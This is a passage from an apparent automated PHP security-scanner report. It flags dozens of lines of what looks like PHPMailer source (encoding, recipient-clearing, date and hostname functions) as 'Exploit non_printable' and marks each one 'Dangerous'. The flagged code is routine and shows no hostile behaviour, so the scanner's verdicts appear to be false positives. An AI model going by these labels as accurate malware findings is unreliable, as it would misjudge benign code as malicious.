</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3025</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeString</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3050</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #DD0000">"\"</span><span style="color: #0000BB">$encoded</span><span style="color: #DD0000">\""</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3089</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3097</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">) && </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">which correctly encodes </span><span style="color: #007700">and </span><span style="color: #0000BB">wraps long</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3125</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3127</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">) > </span><span style="color: #0000BB">mb_strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CharSet</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions anyway</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3139</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has8bitChars</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[\x80-\xFF]/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3147</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">by paravoid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mb</span><span style="color: #007700">-</span><span style="color: #0000BB">encode</span><span style="color: #007700">-</span><span style="color: #0000BB">mimeheader</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#60283</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">base64EncodeWrapMB</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$linebreak </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3194</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">quoted</span><span style="color: #007700">-</span><span style="color: #0000BB">printable</span><span style="color: #007700">-</span><span style="color: #0000BB">decode</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#89417 Adapted from this comment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max </span><span style="color: #007700">= </span><span style="color: #0000BB">76</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3198</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s available (>= PHP5.3)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'quoted_printable_encode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3200</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">quoted_printable_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[^\r\n]{' </span><span style="color: #007700">. (</span><span style="color: #0000BB">$line_max </span><span style="color: #007700">- </span><span style="color: #0000BB">3</span><span style="color: #007700">) . </span><span style="color: #DD0000">'}[^=\r\n]{2}/'</span><span style="color: #007700">, </span><span style="color: #DD0000">"$0=\r\n"</span><span style="color: #007700">, </span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3212</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that was removed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3221</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQPphp</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3226</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">' '</span><span style="color: #007700">, </span><span style="color: #DD0000">'_'</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3288</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringAttachment</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3327</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True on successfully adding an attachment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3329</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addEmbeddedImage</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$cid</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'inline'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path</span><span style="color: #007700">) </span><span style="color: #0000BB">of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3374</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringEmbeddedImage</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3406</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">inlineImageExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3420</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachmentExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 342</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3434</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">alternativeExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3436</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !empty(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">AltBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearQueuedAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearBCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3498</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearReplyTos</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ReturnPath </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAllRecipients</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3530</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3541</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setError</span><span style="color: #007700">(</span><span style="color: #0000BB">$msg</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3563</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">an RFC 822 formatted date</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3568</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rfcDate</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3573</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">date</span><span style="color: #007700">(</span><span style="color: #DD0000">'D, j M Y H:i:s O'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3578</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns </span><span style="color: #DD0000">'localhost.localdomain' </span><span style="color: #007700">if </span><span style="color: #0000BB">unknown</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3582</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">serverHostname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3589</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'gethostname'</span><span style="color: #007700">) && </span><span style="color: #0000BB">gethostname</span><span style="color: #007700">() !== </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3603</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">lang</span><span style="color: #007700">(</span><span style="color: #0000BB">$key</span><span style="color: #007700">)</span>
</span>
